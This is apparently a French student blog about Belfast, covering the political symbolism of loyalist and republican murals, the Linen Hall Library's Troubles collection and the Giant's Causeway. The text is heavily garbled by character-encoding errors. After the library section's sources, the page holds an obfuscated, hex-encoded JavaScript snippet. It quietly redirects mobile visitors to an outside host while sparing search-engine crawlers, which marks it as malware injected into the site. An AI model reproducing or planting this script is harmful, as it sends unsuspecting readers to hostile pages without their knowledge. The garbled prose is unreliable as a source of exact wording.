la��importance de sa flotte (en grande partie construite dans le port de Belfast) constituent un argumentaire de la force du Royaume-Uni A� la��A�chelle locale et internationale. Ce a�?culte de la��Empirea�? est spA�cifique aux loyalistes qui vont chercher leur appui dans sa grandeur historique et A�conomique, et par des reprA�sentations de la matA�rialitA� de cette grandeur : bateaux, avions, troupes, bA?timents etc.. Cette matA�rialitA� de la force se retrouve dans les murales loyalistes reprA�sentant des milices de dA�fense armA�es, avec la plupart du temps un personnage cagoulA� brandissant une arme A� feu. Dans ce genre de murales, nous restons dans une logique da��explicitation de la force da��attaque, sa��illustrant A� travers la menace des symboles da��un a�?gunmana�? et de son arme pointA�e.

La reprA�sentation de personnages historiques, da��A�vA?nements marquants ou de monuments symboliques est A�galement frA�quente dans les fresques protestantes. Nous les voyons par exemple dans des murales dA�diA�es A� Oliver Cromwell (figure politique de la 1A?re rA�volution anglaise), de la bataille de la Somme, etca�� Les nombreuses allusions et commA�morations de ces personnages et A�vA?nements traduisent le dA�sir de sa��approprier et da��utiliser les faits du passA� pour justifier une cause prA�sente. Il y a alors une rA�interprA�tation et une manipulation de la��hA�ritage culturel et historique pour le mobiliser dans un contexte ou cet hA�ritage participera A� la distinction entre protestants et catholiques.

Du cA?tA� rA�publicain, l’exacerbation de la culture est A�galement trA?s marquA�e. Le registre symbolique rA�publicain est pourtant assez diffA�rent de celui des loyalistes et est fortement alimentA� par la��hA�ritage culturel gaA�lique et irlandais. La composition est trA?s rarement centrA�e sur un A�lA�ment en particulier, mais en favorise la��intA�gration de plusieurs. La grande mobilisation de symboles mythologiques montre le dA�sir des rA�publicains de se justifier A� travers la��anciennetA� de leurs racines, qui irait au delA� mA?me de la��A?re chrA�tienne. Harpes, divers tribaux irlandais, trA?fles et spirales servent A� la fois da��ornementation, et A� la fois de rappel de la��appartenance A� une culture ancestrale, plus pacifique et finalement moins politisA�e que la symbolique protestante. La��aspect plus colorA� et moins graphique des murales rA�publicaines sa��oppose au conformisme des murales protestantes, plus froides et directes et rappelant vaguement une iconographie qui se rapprocherait de propagandes fascistes et communistes. Le choix des couleurs na��est pas anodin : le vert rappelle dA�jA� la��Irlande, mais ca��est aussi le symbole de la paix et de la��espoir, en opposition avec le rouge plus violent utilisA� par les loyalistes. La��argument avancA� par les rA�publicains est le folklore inhA�rent A� la culture irlandaise, qui de par son caractA?re sympathique, peut A?tre interprA�tA� comme la��opposA� du cA?tA� menaA�ant de certaines murales loyalistes. Un aspect rA�current dans les murales rA�publicaines est la reprA�sentation de la rA�sistance, qui peut A?tre soit symbolisA�e par un phA�nix A�mergeant de ses cendres, soit par un paramilitaire non cagoulA� pointant son arme vers le ciel da��une pose dynamique. Nous remarquons ici que la��exacerbation de la solidaritA� A� travers la��adversitA�, de la bravoure et de l’hA�roA?sme est un trait de caractA?re que la communautA� catholique a essayA� de transparaA�tre au travers des murales.

A�Affiliation a des conflits A�trangers

Il est difficile de connaA�tre la part de vA�ritA� que les rA�cits des deux partis contiennent. Les conflits, nous la��avons compris, perdurent encore aujourda��hui. Leur A�tendue a da��ailleurs permit A� plusieurs gA�nA�rations belfastoises de vivre ce conflit. NA�anmoins il est A�vident que les gA�nA�rations actuelles ont des opinions diffA�rentes de celles des gA�nA�rations prA�cA�dentes. Il en est de mA?me pour la visibilitA� extA�rieure de la��histoire des troubles, celle ci a A�voluA� de maniA?re croissante depuis leurs dA�buts. Aujourda��hui, la population intA�ressA�e par les murales et par la��histoire de Belfast possA?de de nombreux moyens da��accA�der aux informations dA�sirA�es en comparaison avec la pA�riode durant laquelle les conflits ont dA�butA�, ca��est A� dire durant les annA�es 1920.

PrA�cA�demment, nous avons dA�taillA� la maniA?re avec laquelle les deux partis revendiquent au public extA�rieur leur culture, A� savoir par exemple, la culture celtique pour les nationalistes et la culture anglaise pour les loyalistes. Mais la��on ne trouve pas ces symboles culturels sur la totalitA� des murals. En effet, avec la��augmentation de la visibilitA�, ca��est A� dire la��exposition des faits des conflits au reste du monde, les partis ont du dA�velopper un ensemble da��arguments plus vaste que leurs arguments culturels. Nous allons donc voir dans cette partie les moyens visuels mis en oeuvre par les partis afin de rallier leur cause A� da��autres conflits internationaux. Autrement dit, comment les deux partis dA�fendent leur cause et leur opinion grA?ce aux illustrations des murals en puisant dans le contexte historique international. Cet effet ayant pour but de maximiser le soutien international.

En commenA�ant par le parti rA�publicain, on remarque que celui ci compare sa position avec la position da��autres groupes plus ou moins analogues ayant comme point commun le caractA?re minoritaire rA�primA� ou la��appartenance A� un peuple ne pouvant pas disposer de lui mA?me et tyrannisA�. Le parti est solidaire de beaucoup de minoritA�s injustement opprimA�es ou discriminA�es pour leurs opinions, leur appartenance ou leur sexualitA�. Les causes reviennent aux oppressions des homosexuels jusqua��A� la��oppression du peuple cubain. Nous pouvons notamment voir sur le mural A�ci dessous, qua��un dA�saccord est A�clairement exprimA� avec la politique da��Obama vis A� vis du peuple cubain. Le parti sa��engage A�galement A� reprA�senter le conflit territorial des Pays Basques.

Capture da��A�cran 2016-05-23 A� 17.49.54

On trouve ensuite un nombre important de murals nationalistes faisant rA�fA�rence au parti palestinien. Les signes reconnaissables sont ici, le drapeau de la Palestine et ses couleurs, la��utilisation de contenus textuels en calligraphie palestinienne.

Capture da��A�cran 2016-05-23 A� 17.50.06

Les nationalistes soulignent que ce peuple est soumis au joug da��un A�tat illA�gitime ne respectant pas le droit international. Les nationalistes rA�publicains sa��approprient le soutien rA�ciproque des conflit A�trangers, mais aussi se comparent directement A� des personnages internationaux connus et vus par une majoritA� de la population comme exemplaires ou respectables. Par exemple, comme on peut le voir dans la peinture murale reprA�sentant Bobby Sands et Nelson Mandela cA?te A� cA?te.

Capture da��A�cran 2016-05-23 A� 18.00.05

Le message est limpide, Nelson Mandela a combattu un rA�gime politique illA�gitime et violent et a A�tA� emprisonnA�, tout comme Bobby Sands. On peut aussi voir, non loin du lieu oA? plusieurs personnes ont A�tA� tuA�es pendant le Bloody Sunday, une reproduction du Tres de mayo de Goya (ci dessous) pour rappeler les tirs des parachutistes sur des civils, ce qui peut s’apparenter A� une exA�cution sommaire. Cette dA�marche de victimisation est encore plus efficace en utilisant des symboles internationaux et un registre mA�moriel connus de tous.

Capture da��A�cran 2016-05-23 A� 18.00.12

Lorsque la��on observe les murals du parti loyaliste, on trouve une rA�fA�rence frA�quente A� un peuple A�extA�rieur la��aidant A� justifier sa position. Cette rA�fA�rence revient au peuple israA�lien en contexte de conflit israA�lo-palestinien. En effet, le parti loyaliste est en accord avec le fond idA�ologique, la forme de la��A�tat et aussi avec le mode da��action, plus gA�nA�ralement, est da��accord avec la��attitude inflexible de la��A�tat IsraA�l ainsi que sur ses actions militaires envers les terroristes et la population civile. De plus les loyalistes expliquent qua��IsraA�l est le pays le plus prospA?re A�conomiquement de la rA�gion, donc le modA?le qui ressort le plus gagnant de la situation de conflit. Ils mettent ce point de vue en lien avec la situation de la��Irlande du Nord, considA�rant que la rA�gion doit sa rA�ussite da��antan A� son intA�gration dans la Grande-Bretagne.A�Les protestants, eux plutA?t que de prendre une position victimaire, justifient leurs actions violentes en rA�actions aux actes terroristes des unionistes.

Victimisation des partis

Nous faisons la��usage dans cette partie du terme victimisation et de ses dA�rivA�s. Nous entendons par a�?victimisera�? la��acte ou parole visant A� rendre son parti victime aux regards de la population extA�rieure au conflit, ainsi qua��en tant que justification des actions offensives ou dA�fensives envers la��autre camp. Aussi, da��aprA?s la DA�claration des Principes Fondamentaux de Justice Relatifs aux Victimes de la criminalitA� et aux victimes d’abus de pouvoir, lesA�victimes sont dA�finies comme a�?des personnes qui, individuellement ou collectivement, ont subi un prA�judice, notamment une atteinte A� leur intA�gritA� physique ou mentale, une souffrance morale, une perte matA�rielle, ou une atteinte grave A� leurs droits fondamentaux, en raison d’actes A�ou d’omissions qui A�enfreignent A�les A�lois pA�nales en vigueur A�dans A�un A�Etat membre, A�y A�comprisA�celles qui proscrivent les abus criminels de pouvoir.a�?

  • MA�moriel des victimes

IMG_09372222

Le but du mA�morial est de rendre hommage A� des victimes de guerres ou da��A�vA?nements particuliA?rement tragiques. Le mA�morial sert aussi A� commA�morer un A�vA?nement important pour une communautA� en terme de changement A�conomique, politique ou social. Le monument, ou le lieu, mis A� disposition na��est pas simplement un espace ou un objet concret, il contient une dimension abstraite et il est vecteur da��une mA�moire collective. Ainsi, les lieux de mA�moires sont respectA�s par toute personne concernA�e parA�la morale collective, quasiment universelle, liA�e au respect des morts et de ce qui les englobe.

Au travers deA�ces mA�moriaux, on rend hommage A� des victimes et on permet A�galement le deuil collectif de la communautA� concernA�e. La ville de Belfast possA?de un grand nombre de mA�moriauxA�dont la plupart sont situA�s principalement dans les quartiers encore sA�paratistes. Cela sa��explique enA�raisonA�des nombreux conflits intra-muros subis dA?sA�1920 avec le projet da��autonomie de la��Irlande, alorsA�sous la domination de la Grande-Bretagne rA�gisA�par Home Rule. Ca��est A� partir de cette proposition que des tensions entre les rA�publicains nationalistes de Belfast et les loyalistes unionistes dA�butA?rent, prenant de plus en plus da��ampleur et menant A� plusieurs conflits civils, appelA�s troubles, jusque dans les annA�es 1990. Ca��est parce que ces conflits engendrA?rent de nombreux morts que la mise en place de monuments mA�moriaux fut nA�cessaire. NA�anmoins, il semblerait que malgrA� les actes de paix conclusA�entreA�les communautA�s de Belfast, les dissensionsA�perdurent au sein mA?me de ces lieux de mA�moire. En effet, le cas de Belfast est particulier puisqua��on trouve dans la ville des mA�moriaux peints, accompagnA�s de murals colorA�es relatives aux troubles. Sur ces murals on peut apercevoir des visages de personnalitA�s importantes dans les conflits aux cA?tA�s de symboles liA�s aux religions ou aux cultures des deux partis.

On peut considA�rerA�que la rA�alisation da��un monument mA�moriel reprA�sente en quelques sortes une prise de position A� partir du moment oA? la��on rend hommage aux morts da��un seul camp et pas de la��autre. A�On peut donc considA�rer que le spectateur – supposA� neutre – va se placer automatiquement da��un cA?tA� ou de la��autre des deux camps. En ajoutant, comme A� Belfast, des visages et des symboles trA?s dA�taillA�s aux mA�moriaux, la sensibilitA� du spectateur est touchA�e car celui ci va sa��identifier plus facilement aux partisans du mA�morial. Le spectateur est nettement moins A�mu sa��il na��a en face de lui qua��une liste de noms de victimes auxquelles il ne peut se rA�fA�rer. En revanche, il est fort probable qu’un touriste, pA?re de famille, voyant en face de luiA�se dresser une peinture murale reprA�sentant des enfants expliquantA�que ces derniersA�furentA�tuA�s par les forces da��un des deux partis, le pA?reA�va se sentir concernA� et son opinion sur le conflit en sera influencA�e. Il est fort probable que la��image associA�e A� la description favorise cette sensation. Le monument, alors envisagA� comme vecteur da��idA�e pacifiste au premier abord, aurait plutA?t tendance A� faire perdurer la conflictualitA�, da��autant plus sa��il est accompagnA� par une mural renforA�ant le pouvoir da��identification sur leA�spectateur.

Sachant que le dark tourism est trA?s dA�veloppA� dans cette ville, on peut A�mettre la��hypothA?se que les mA�moriaux aux victimes ne sont pas uniquement crA�A�s pour les populations locales et protagonistes du conflit mais qua��elles se dirigent vers les touristes. En effet, il est possible que les murals peintes aux cA?tA�s des mA�moriaux soient mobilisA�es afin de victimiser le parti concernA� envers la��autre et face A� la��opinion internationale. Ainsi, grA?ce A� la dimension sensiblement touchante de la jonction mA�morial-murals, les partis se victimisent et se dA�chargent donc en partie de la responsabilitA� des dommages humains et matA�riels dus aux troubles.

Nous avons donc vu que la justification des actions des partis dans les conflits est prA�sente au travers de symboles dans les murals. Nous avons prA�cA�demment avancA� la��idA�e que les partis cherchent A� rallier les observateurs extA�rieurs aux conflits dans leur camp, en disposant notamment les murals de maniA?re A� toucher le spectateur et A� se placer en tant que victime dans le conflit. Dans cette partie nous expliquerons comment ce mA?me processus de victimisation est prA�sent dans les textes des murals. GrA?ce au plan dA�taillA� du site http://www.belfast-murals.co.uk, un A�chantillon de cinquante murals (vingt cinq murals unionistes et vingt cinq murals loyalistes) fut utilisA� afin da��A�tudier le champ lexical utilisA� dans ces peintures. Nous chercherons A� montrer que les deux partis ne font pas usage des mA?mes mots et que cela traduit deux maniA?res da��expliquer le conflit. Le tableau ci dessous rA�pertorie les rA�sultats de la��analyse de contenu.

content analysisNous pouvons donc observer dans notre A�chantillon grA?ce au tableau plusieurs champs lexicaux ressortant des mots utilisA�s pour reprA�senter les partis unionistes et loyalistes. Ces champs lexicaux sont de trois ordres : la lutte, les rA�fA�rences territoriales et communautaires et le post-conflictualisme.

  • Analyse du champs lexical de la lutte :

Le tableau prA�cA�dent montreA�que le parti loyaliste utilise plus de mots liA�s A� la lutte que le parti nationaliste. Le mot militantsA�est visible sur environ vingt pour cent des murals loyalistes (da��aprA?s notre A�chantillon de vingt cinq murals) tandis que le mot le plus frA�quemment utilisA� pour les rA�publicains est resistance. Ces deux mots ne sont pas en opposition mais ne se dA�finissent pas de la mA?me maniA?re; ainsi da��aprA?s la dA�finition anglaise du site Merriam Webster, militant signifie A� having or showing A�a A�desire A�or A�A�willingness A�A�to A�use A�A�strong, A�A�extreme, A�A�A�and A�A�A�A�A�sometimes forceful methods to achieve somethingA�A? (Simple dA�finition of militants [en ligne] http://www.merriam-webster.com/dictionary/militant) Ce mot est donc synonyme en anglais da��action politique ou idA�ologique violente. En ce qui concerne le mot resistance, toujours da��aprA?s la mA?me source, la dA�finition est la suivante : A�refusal to accept something new or different A� ou A�effort made to stop or to fight against someone or something A�A? (Simple dA�finition of resistance [en ligne] http://www.merriam-webster.com/dictionary/resistance). Autrement dit, la��acte de rA�sistance na��inclue pas nA�cessairement un acte violent.

En tenant compte des autres mots utilisA�s par le parti loyaliste tels que guns, attacked, conflict on rA�aliseA�la diffA�rente vision des troubles par chacun des partis. Pour parler du conflit, le parti loyaliste fait A�plus appel A�A�la dimension brutale et armA�e du conflit. A� l’opposA�, le parti rA�publicain utilise les mots brave, oppression, fall, faisant plutA?t rA�fA�rence A� un champ lexical de la survie. Les rA�publicains se dA�crivent donc plus comme A�tant en position dominA�e ou alors en position de subsistance face A� une force supA�rieure politique opposA�e et offensive. A�

  • Analyse du champs lexical post-conflictualiste:

En ce qui concerne la dimension post-conflictualiste, les murals des deux camps font une utilisation commune de mots tel que freedom. La��usage de ce mot (libertA�) pourrait faire rA�fA�rence A� la��ultime but vers lequel tend la ville de Belfast. La diffA�rence da��usage du mot par les deux partis rA�side ici dans les extensions employA�es. En effet, freedom est utilisA� sous diffA�rentes dA�rivA�es par le parti nationaliste rA�publicain, on peut donc lire dans les quartiers rA�publicains les termes free, free union ou encore liberation A� plusieurs localisations.

Le deuxiA?me mot le plus utilisA� par le parti loyaliste unioniste est murder, alors que celui na��est visible qua��une seule fois de la��autre cA?tA� du conflit. Nous pouvons noter A�galement que la devise du parti loyaliste : A� no surrender A� apparait deux fois parmi notre A�chantillon. Ce slogan est A�A�contre-sensA�de la��idA�ologie pacifiste puisque qua��elle se traduit par A� ne pas renoncer A�. Elle est depuis longtemps utilisA�e par le parti, qui considA?re que les conflits na��auront de fin que lorsque la��autre camp aura cA�dA�, autrement dit, le parti pour la gouvernance anglaise exprime son mA�contentement envers la��idA�e de trouver un terrain da��entente mettant fin aux tensions.

Les deux partis font enfin rA�fA�rence aux victimes et aux combattants ayant servit leur communautA�. La��usage de murder est frA�quent pour les loyalistes tandis qua��il na��apparaA�t qua��une fois chez les nationalistes. Enfin, on peut noter le terme martyrs utilisA� par les nationalistes, impliquant directement la souffrance notamment da��aprA?s le dictionnaire anglais Merriam Webster A�a�?a person who is killed or who suffers greatly for a religion, cause, etc..a�? (simple definition of martyr [en ligne] http://www.merriam-webster.com/dictionary/martyr)

Plus largement, il est remarquable que les partis anglais voient en la situation post-conflit un espoir de victoire progressive sur le camp opposA�. A l’inverse, le vocabulaire utilisA� par les nationalistes, pourrait indiquer que ceux ci revendiquent une plus forte volontA� de paix. De plus, ces derniers font un usage frA�quent de mots relatifs au martyre et A� une position, encore, de victimes premiA?res de ces troubles.

  • Analyse du champs lexical de territorialitA� et de communautarisme:

Ce champ lexical est peu reprA�sentA� comparA� aux deux autres ressortis de la��A�tude, nA�anmoins on peut remarquer deux niveaux da��appartenance des partis.

Le parti rA�publicains nationaliste A� tendanceA�A� valoriser les origines celtiques et irlandaises tandis que le parti loyaliste lA�gitime directement sa prA�sence en Ireland du Nord de part la��appropriation des toponymes Ulster, North Belfast. Ce parti loyaliste se considA?re A�galement comme une A�quipe (team) alors que la��on retrouve plutA?t la��idA�e de communautA� du cA?tA� des nationalistes. Enfin, on peut remarquer au sein de notre A�chantillon une diffA�rence da��A�chelle lorsqua��il sa��agit des protagonistes du conflits. En effet nous pouvons trouver dans les murals loyalistes le terme royalty, menant directement au sommet de la gouvernance recherchA�e, alors que les nationalistes emploient le terme civil A� deux reprises. La volontA� de reprA�senter les populations concernA�es dans le conflit est donc diffA�rente selon les partis, la vision est soit micro, soit macro.

A la suite de cette analyse de contenu, nousA�distinguons deux mentalitA�s. En effet, nous avons observA� que les partis na��A�valuent pas de la mA?me maniA?re leur rA?le dans le conflit. Quand les loyalistes prA?nent la puissance de leurs armA�es et troupes militantes qui ne renonceront jamais A� la lutte, les nationalistes, A� la��opposA�, na��A�voquent pratiquement pas leurs actions violentes dans le conflit. Au contraire, aprA?s cette analyse nous pouvons remarquer que ceux ci ont tendance A� A�voquer leurs forces de rA�sistances et donc intrinsA?quement, leur statut de victime en recherche de processus de paix. Quant au registre de justification, l’analyse de contenu dA�montre queA�les anglais loyalistes justifient leurs actions en faisant rA�fA�rence textuellement A� leur connaissance du territoire nord-irlandais afin de prouver leur prA�sence ancienne et comme A� logique A� sur ce territoire. Ainsi, ils lA�gitiment les troubles et assument la dA�fense da��un territoire qua��ils considA?rent acquis. En parallA?le, les irlandais rA�publicains remontent jusqua��aux origines celtiques pour revendiquer leur appartenance A� un peuple irlandais avant mA?me la��existence dune population anglo-irlandaise.

Symboles les plus prA�sents
Symboles les plus prA�sents

cliquer pour agrandir le tableau

MA�thode utilisA�e :

Afin de rA�aliser au mieux notre enquA?te nous avons eu besoin da��obtenir de la��information formelle et de la��information informelle; mais principalement da��informations qualitatives. Nous avons A�galement optA� pour une approche interprA�tative, ca��est A� dire da��A�tudier les sources A� notre disposition afin de comprendre la culture en question.

Continuer la lecture de Des symboles pour se justifier

Linen Hall Library

Par Chantal Vetter

La visite de la Linen Hall Library nous a peu A� peu fait entrer dans la��histoire du conflit. FondA�e en 1788 par la Belfast Reading Society, elle est la plus ancienne bibliothA?que de la ville.

Notre groupe sa��est sA�parA� pour faire un tour guidA�, proposA� par deux bA�nA�voles. En montant A� la��A�tage supA�rieur, nous sommes passA�s A� cA?tA� da��une collection da��affiches qui nous a donnA� un aperA�u des slogans utilisA�s durant la pA�riode des Troubles. Les affiches font partie de la collection Troubled Images. Elles ont A�tA� sA�lectionnA�es parmi plus de 3a��500 posters. Leur aspect graphique et visuel ainsi que les A�crits reflA?tent les discours de cette pA�riode. La collection a dA�jA� A�tA� prA?tA�e aux USA, au pays Basque et A� la Cisjordanie, ces deux derniA?res rA�gions A�tant elles-mA?mes liA�es A� un conflit identitaire.

Troubled Images Collection, Chantal Vetter, 29.02.2016, Linen Hall library, Belfast

Notre deuxiA?me guide nous a ensuite montrA� la collection la plus originale de la bibliothA?que qui est la Northern Ireland Political Collection, originale car elle ne rassemblent pas seulement des documents A�crits comme on pourrait sa��y attendre mais aussi de nombreux objets instrumentalisA�s par les acteurs du conflit et elle est la seule en son genre. Tout a commencA� en 1969, lorsque Jimmy Vitty, le bibliothA�caire de la��A�poque, a gardA� un tract pour les Civils Rights qua��il avait reA�u dans un bar. Depuis, plus de 350a��000 objets et A�crits concernant le conflit, da��origine rA�publicaine mais aussi da��origine loyaliste, ont A�tA� rassemblA�s dans la��espace politiquement neutre de la Linen Hall Library. Entre les statuettes de Ian Paisley et de Gerry Adams qui se font face, une lavette pour bA�bA� et un t-shirt avec Bart Simpson ou encore Bob the Builder affirmant leur loyautA� au Royaume-Uni ou se prononcent pour une Irlande rA�unifiA�e, les anciens livres A�crits en perse perdent de leur importance et le bibliothA�caire A�tait bien convaincu que les souvenirs des Troubles apportent plus aux visiteurs que des pages A�crites en langues inconnues. Ces objets ont A�tA� dA�tournA�s de leur utilitA� quotidienne pour affirmer une position politique et une identitA�, par une rA�appropriation, par exemple, du terme prod, appellation utilisA�e par les Catholiques pour dA�nigrer les Protestants (Cf. lavette et Bart Simpson). Ce sont surtout les loyalistes qui utilisent des personnages populaires, mais Bob the Builder qui, lui, reconstruit les 32 comtA�s et rA�unit ainsi la��Irlande du Nord au reste de la��Irlande semble plutA?t A?tre mobilisA� par les rA�publicains.

Northern Ireland Political Collection, Chantal Vetter, 29.2.2016, Linen Hall Library, Belfast

Les objets probablement les mieux conservA�s de la bibliothA?que A�taient des messages qua��ont A�crits Bobby Sands et un autre prisonnier rA�publicain sur des papiers de cigarettes ou du papier toilette. Les messages A�tant protA�gA�s par le mince film plastique du paquet de cigarettes, ils les faisaient sortir de prison en les passant de bouche A� bouche lors da��un baiser da��adieu. Outre ces objets personnels liA�s aux Troubles, la Northern Ireland Political Collection rassemble aussi plus de 2a��000 pA�riodiques (notamment du Loyalist News et de la��An Phoblacht), les archives de la Northern Ireland Civil Rights Association et de la Northern Ireland Womens Rights Association, des nouvelles, poA�sies et piA?ces de thA�A?tresa��

La Linen Hall Library reste un endroit particulier et joue un grand rA?le pour donner A� ses visiteurs une meilleure comprA�hension du conflit en mettant A� disposition de nombreux documents relatant la vision des deux parties.

Sources:

Linen Hall Library, [en ligne], URLA�: https://www.linenhall.com, ConsultA� le 16.3.2016

Urban Dictionary, [en ligne], URLA�: http://www.urbandictionary.com/define.php?term=Prod, ConsultA� le 14.5.2016

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

La ChaussA�e des GA�ants

Par Sophie Compagnon, Anna Paiuc et Simon Paratte

Formation

La ChaussA�e des gA�ants a�� ou Gianta��s Causeway en anglais a�� est un site gA�ologique composA� de plus de 40a��000 colonnes de basalte. Elles partent de la cA?te de la��Irlande du Nord, plus prA�cisA�ment du plateau da��Antrim, et sa��enfoncent dans la��ocA�an Atlantique.

Ce site trA?s particulier a permis le dA�veloppement des sciences de la terre. En effet, il est A�tudiA� depuis plus de 300 ans et a vu sa��opposer les A�coles franA�aises et anglaises. La��une affirmait que cette formation A�tait due A� des A�lA�ments venant de la terre et la��autre de la��ocA�an. Comme nous allons le voir, ca��est une combinaison des deux qui a crA�A� ce paysage spectaculaire.

Il y a 40 A� 60 millions da��annA�es, durant la��A?re gA�ologique tertiaire, le nord de la��ocA�an Atlantique sa��est sA�parA�, crA�ant une activitA� gA�ologique violente et da��importantes coulA�es de lave. Quand la lave a refroidi, elle sa��est solidifiA�e en roche basaltique et a formA�, par couche successive de basalte, le plateau da��Antrim. Ca��est A� cause de la contraction thermique relativement rapide de la lave que celle-ci a pris la forme de colonnes hexagonales. Au fil du temps, le plateau ca��est aplani A� cause de la��A�rosion provoquA�e par la��ocA�an.

index1

Vue de la ChaussA�e des gA�ants, Sophie Compagnon, 02.03.16, ChaussA�e des gA�ants.

Le mythe

La lA�gende de la crA�ation de la chaussA�e des gA�ants provient de la mythologie celtique irlandaise. Elle raconte que deux gA�ants, Finn MacCool et Benandonner A�taient ennemis jurA�s depuis longtemps, mais ne vivant pas sur la mA?me A�le, ils ne sa��A�taient jamais confrontA�s. En effet, Finn vivait en Irlande alors que Benandonner faisait partie des gA�ants A�cossais.

Un jour, A�nervA�, Finn dA�cida de crA�er un chemin pour dA�fier enfin son ennemi. Pour ce faire, il lanA�a des pierres dans la��eau ce qui donna naissance A� la chaussA�e des gA�ants. Mais il remarqua trA?s vite son erreur en voyant arriver Benandonner, car il A�tait bien plus grand que lui. PaniquA�, Finn rentra chez lui demander de la��aide A� sa femme Oonagh qui eut rapidement la��ingA�nieuse idA�e de dA�guiser son mari en bA�bA� et da��inviter Benandonner chez elle en prA�tendant son mari parti A� la chasse.

Elle prit tout son temps A� mettre en valeur la grandeur et la force de Finn, en indiquant A� Benandonner les A�normes rochers qua��il A�tait capable de lancer, la nourriture dure qua��il adorait manger alors qua��elle cassait les dents au gA�ant A�cossais. Et finalement, Oonagh lui prA�senta Finn dA�guisA� en bA�bA�. Benandonner fA�t effrayA� en voyant le bA�bA� car il imaginait la taille de son pA?re, son ennemi. Il prit la fuite et dA�truit dans son passage la chaussA�e des gA�ants pour A�viter que son ennemi ne vienne le dA�fier en Ecosse.

Il ne resta que le dA�but du passage des deux cA?tA�s, la��un en Irlande qui devint la chaussA�e des gA�ants et la��un en Ecosse qui devint la grotte de Fingal sur la��A�le de Staffa.

Visitor centre

Avant d’arriver A� la ChaussA�e des GA�ants, il faut entrer dans le centre touristique dA�diA� au lieu. EntiA?rement remis A� neuf depuis un incendie, ce centre a A�tA� amA�nagA� afin de s’intA�grer au mieux A� son environnement, en effet son toit est recouvert de verdure et ses parois ressemblent aux colonnes de basalte.
A� l’intA�rieur, une partie du centre propose rafraA�chissements et souvenirs. Une autre partie du centre prA�sente la ChaussA�e des GA�ants, sa formation, sa lA�gende, ainsi que diverses activitA�s interactives afin de se familiariser au lieu.

